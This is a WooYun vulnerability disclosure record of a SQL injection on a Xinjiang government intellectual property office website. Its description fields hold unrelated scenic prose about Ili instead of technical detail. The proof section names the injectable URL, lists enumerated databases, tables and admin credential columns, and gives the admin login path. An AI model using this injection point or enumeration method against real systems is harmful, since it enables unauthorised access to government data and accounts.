
Vulnerability summary

Defect ID: wooyun-2013-043933

Title: SQL injection in the Xinjiang Uyghur Autonomous Region Intellectual Property Office site allows access to the admin back end

Vendor: 新疆维吾尔自治区知识产权局 (Xinjiang Uyghur Autonomous Region Intellectual Property Office)

Author: 雅柏菲卡

Submitted: 2013-11-28 16:53

Fix time: 2014-01-12 16:53

Disclosure time: 2014-01-12 16:53

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Response Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2013-11-28: Details sent to the vendor, awaiting vendor handling
2013-12-01: Vendor has confirmed; details disclosed to the vendor only
2013-12-11: Details disclosed to core white hats and relevant domain experts
2013-12-21: Details disclosed to regular white hats
2013-12-31: Details disclosed to intern white hats
2014-01-12: Details disclosed to the public

Brief description:

A pastoral song glides over the high slopes
glides over the desert poplar groves
mingled with the fragrance of fruit
echoing across the vast grassland
our hearts are filled with beautiful joy

Detailed description:

Ili, on the northwestern frontier, has long been known as the "Jiangnan beyond the Pass". Ili is a warm green island in the heartland of Central Asia, a heaven-sent treasure on the distant western frontier, a Jiangnan of blossoming apricots amid a thousand li of frontier land... Bordering foreign lands, Ili is steeped in rich exotic flavor. The Ili region is encircled and divided by the branches of the Tianshan mountains, and its unique geography gives rise to a series of distinctive and remarkable natural landscapes. Ili is beautiful for its pleasant climate, lovely scenery, abundant resources and rich produce; beautiful for its strong ethnic character and colorful ethnic customs; and beautiful for its long history and its many tourist sights...
The Fruit Valley (Guozigou), fragrant for ten li, with its eighteen-bend mountain road, layered forests, gushing waterfalls and springs, riotous mountain flowers and groves of fruit trees, is called a "wondrous fairyland", where the scenery of four seasons can be seen in a single day and every step reveals a different view; Sayram Lake, with its rippling blue water under a blue sky, is ringed by snow mountains, with white clouds drifting idly through the ages. Water birds settle on its shores every year, and it is known as a "spiritual land beyond the world"; the boundless Nalati grassland, with its flat river valley and lush forests, has been a famous pasture since ancient times; the Ili River, flowing slowly westward like a gentle mother, silently nourishes this beautiful land.
Along the riverbank is a green grove of white poplars, evoking the enchanting mood of "Night on the Grassland". Rarely does one see such bright blue skies and green fields, or such vast fertile farmland below high mountains! Here, snow mountains, long rivers and the setting sun frame small bridges, flowing water and cottages; here, cattle, sheep, felt yurts and pastures overlap with modern towns in the same picture... The beauty of Ili is truly beyond description. Besides the natural scenery, in Ili you can also watch Uyghur farmers fetch the bride in a blue horse-cart, taste fragrant pilaf and tender roast lamb, gallop across the grassland on a fine horse, and enjoy the pastoral scenery to your heart's content. You can also visit a Kazakh yurt as a guest and listen to warm-hearted Kazakh elders tell stories from long ago...

Proof of vulnerability:

Injection point: http://www.xjipo.gov.cn/Counter/Counter.aspx?CounterID=1
available databases [9]:
[*] dcbase
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] xjwwezscqj
[*] xjzscqj
Database: xjzscqj
[102 tables]
+------------------------------+
| dbo.LabelTree |
| dbo.PE_Special |
| dbo.TM_ActureStep |
| dbo.TM_AdZone |
| dbo.TM_Admin |
| dbo.TM_Advertisement |
| dbo.TM_Analysis |
| dbo.TM_Announce |
| dbo.TM_AreaCollection |
| dbo.TM_Article |
| dbo.TM_Author |
| dbo.TM_Catalog |
| dbo.TM_Channel |
| dbo.TM_City |
| dbo.TM_Class |
| dbo.TM_Comment |
| dbo.TM_Company |
| dbo.TM_ComplainItem |
| dbo.TM_Config |
| dbo.TM_CopyFrom |
| dbo.TM_Counter |
| dbo.TM_Country |
| dbo.TM_Department |
| dbo.TM_Dictionary |
| dbo.TM_Field |
| dbo.TM_Filters |
| dbo.TM_FlowDefine |
| dbo.TM_FlowStep |
| dbo.TM_FlowType |
| dbo.TM_Friend |
| dbo.TM_FriendSite |
| dbo.TM_FsKind |
| dbo.TM_Funcs |
| dbo.TM_GovAreaCode |
| dbo.TM_GovInfo |
| dbo.TM_GovService |
| dbo.TM_GuestBook |
| dbo.TM_GuestKind |
| dbo.TM_HistrolyNews |
| dbo.TM_InfoS |
| dbo.TM_InfoSend |
| dbo.TM_Interview |
| dbo.TM_InterviewQuestionType |
| dbo.TM_InterviewQuestions |
| dbo.TM_InterviewUser |
| dbo.TM_InvoiceItem |
| dbo.TM_Item |
| dbo.TM_ItemLog |
| dbo.TM_JobCategory |
| dbo.TM_JsFile |
| dbo.TM_KeyLink |
| dbo.TM_KeywordType |
| dbo.TM_Keywords |
| dbo.TM_Label |
| dbo.TM_LabelElement |
| dbo.TM_LabelInfo |
| dbo.TM_Log |
| dbo.TM_ManageTables |
| dbo.TM_Message |
| dbo.TM_NetGuard |
| dbo.TM_Photo |
| dbo.TM_PigeonholeActureStep |
| dbo.TM_PigeonholeFields |
| dbo.TM_PigeonholeWorkFlow |
| dbo.TM_SelfLabel |
| dbo.TM_Skin |
| dbo.TM_Special |
| dbo.TM_Survey |
| dbo.TM_SurveyOptions |
| dbo.TM_SurveyTopic |
| dbo.TM_TablesContent |
| dbo.TM_TablesFields |
| dbo.TM_Template |
| dbo.TM_TemplateInfo |
| dbo.TM_TemplateProject |
| dbo.TM_TemplateSort |
| dbo.TM_TitlePic |
| dbo.TM_UsedDetail |
| dbo.TM_User |
| dbo.TM_User111 |
| dbo.TM_UserGroup |
| dbo.TM_Vote |
| dbo.TM_WebSite |
| dbo.TM_WorkFlow |
| dbo.TM_WorkFlowState |
| dbo.TM_WorkPlace |
| dbo.V_CommentTitle |
| dbo.V_CommnetPassed |
| dbo.ViewTM_FinishWork |
| dbo.ViewTM_User |
| dbo.ViewTM_Work |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tabArticleClass |
| dbo.test11 |
| dbo.test_Class |
| dbo.vieArticle |
| dbo.vieGovInfo |
| dbo.vieInfoSend |
| dbo.viewTM_gov |
| zym.DIY_TEMPCOMMAND_TABLE |
+------------------------------+
Database: xjzscqj
Table: dbo.TM_Admin
[41 columns]
+------------------------+------+
| Column | Type |
+------------------------+------+
| AdminName | bit |
| AdminPurview_Article | bit |
| AdminPurview_economy | bit |
| AdminPurview_GuestBook | bit |
| AdminPurview_House | bit |
| AdminPurview_Job | bit |
| AdminPurview_Others | bit |
| AdminPurview_Photo | bit |
| AdminPurview_Shop | bit |
| AdminPurview_Soft | bit |
| AdminPurview_Supply | bit |
| AreaCode | bit |
| AreaID | bit |
| AreaName | bit |
| arrClass_Check | bit |
| arrClass_GuestBook | bit |
| arrClass_House | bit |
| arrClass_Input | bit |
| arrClass_Manage | bit |
| arrClass_View | bit |
| Count_Add | bit |
| Count_Check | bit |
| Count_Reject | bit |
| DepartCode | bit |
| DepartID | bit |
| DepartName | bit |
| EnableMultiLogin | bit |
| ID | int |
| LastLoginIP | int |
| LastLoginTime | int |
| LastLogoutTime | int |
| LinkEmail | int |
| LinkMobile | int |
| LinkTel | int |
| LoginTimes | int |
| Password | int |
| Purview | int |
| RndPassword | int |
| RoleName | int |
| UserName | int |
| WebSiteID | int |
+------------------------+------+

[Screenshot: QQ截图20131124191123.jpg]


Admin back-end address: http://www.xjipo.gov.cn/admin/

[Screenshot: QQ截图20131124191239.jpg]

Remediation:

Copyright notice: please credit the source when reposting: 雅柏菲卡@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2013-12-01 22:38

Vendor reply:

Latest status:

None yet